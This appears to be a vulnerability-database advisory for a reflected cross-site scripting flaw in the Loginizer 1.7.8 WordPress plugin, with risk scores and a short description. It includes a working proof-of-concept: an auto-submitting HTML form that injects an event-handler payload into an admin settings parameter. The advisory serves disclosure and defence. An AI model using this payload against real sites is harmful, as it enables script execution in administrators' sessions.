Lucene search

K
wpexploitWpvulndbWPEX-ID:8126FF73-C0E5-4C1B-BA10-2E51F690521E
HistoryMay 02, 2023 - 12:00 a.m.

Loginizer 1.7.8 - Reflected XSS

2023-05-0200:00:00
wpvulndb
53
loginizer
reflected xss
execute unauthorized code
admin
security vulnerability
web form
exploit

0.001 Low

EPSS

Percentile

24.9%

The plugin does not escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=loginizer_security" method="POST">
      <input type="hidden" name="limit_session[count]" value='"style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

0.001 Low

EPSS

Percentile

24.9%

Related for WPEX-ID:8126FF73-C0E5-4C1B-BA10-2E51F690521E